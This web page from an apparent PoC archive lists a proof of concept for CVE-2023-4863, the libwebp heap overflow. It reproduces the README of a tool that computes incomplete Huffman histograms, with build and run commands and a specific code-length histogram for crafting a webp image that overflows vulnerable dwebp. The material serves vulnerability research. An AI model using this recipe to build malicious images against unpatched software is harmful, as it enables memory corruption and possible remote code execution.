Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2023-4863 PoC — Google Chrome 缓冲区错误漏洞

Source
https://github.com/caoweiquan322/NotEnough
Associated Vulnerability
Title:Google Chrome 缓冲区错误漏洞 (CVE-2023-4863)
Description:Heap buffer overflow in libwebp in Google Chrome prior to 116.0.5845.187 and libwebp 1.3.2 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)
Description
This tool calculates tricky canonical huffman histogram for CVE-2023-4863.
Readme
# Huffman table hacking tool



This tool calculates tricky canonical huffman histogram, which is able to trigger OOB (Out Of Band) write for vulnerable libwebp library (i.e. libwebp <= `1.3.1`). This vulnerability is known as `CVE-2023-4863` or `CVE-2023-41064`. We can overflow the pre-allocated huffman table by  at most **132 entries**.

The rationale is that libwebp assumes the huffman histogram contained in each webp image is well formated. That is, the decoding tree must be a **complete tree**. With this assumption, the libwebp group took advantage of an [enough](https://github.com/madler/zlib/blob/develop/examples/enough.c) tool to estimate the maximum memory size to build the decoding huffman table (a powerful structure to decode canonical huffman codes rapidly). However, hackers are able to construct an **incomplete** tree to go beyond this memory limit and thus overflow the pre-allocated memory.

This hacking tool was created by adjusting [enough](https://github.com/madler/zlib/blob/develop/examples/enough.c) with incomplete tree support.


Compile the code using command below:


```bash
gcc -o NotEnough ./main.c
```

For a huffman table with 40-symbol, 8-bit root table and maximum depth being 15, the maximum number of table entries is `410`. However, by constructing an incomplement tree, the number of table entries could be `542`. Try the command below:


```bash
./NotEnough 40 8 15
```

An example of such trees is as below:


![Bad tree](img/graphviz-40-542-tree.svg)

Note that we pruned the branches with no leaves for brief.

 You can then use the [craft](https://github.com/mistymntncop/CVE-2023-4863) tool to construct an effective webp image to overflow **dwebp** tool (version <= `1.3.1`). Change the huffman code histogram **code\_lengths\_counts[4]** to {0, 1, 0, 0, 0, 0, 0, 0, 0, 3, 5, 9, 17, 1, 1, 3} accordingly, and rebuild the tool:



```bash
vim craft.c    # Change huffman code histogram accordingly, i.e. about line 495.
gcc -o craft craft.c
./craft -o bad_542.webp
```



Please check [@benhawkes's blog](https://blog.isosceles.com/the-webp-0day/) to have a better idea of `CVE-2023-4863`.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →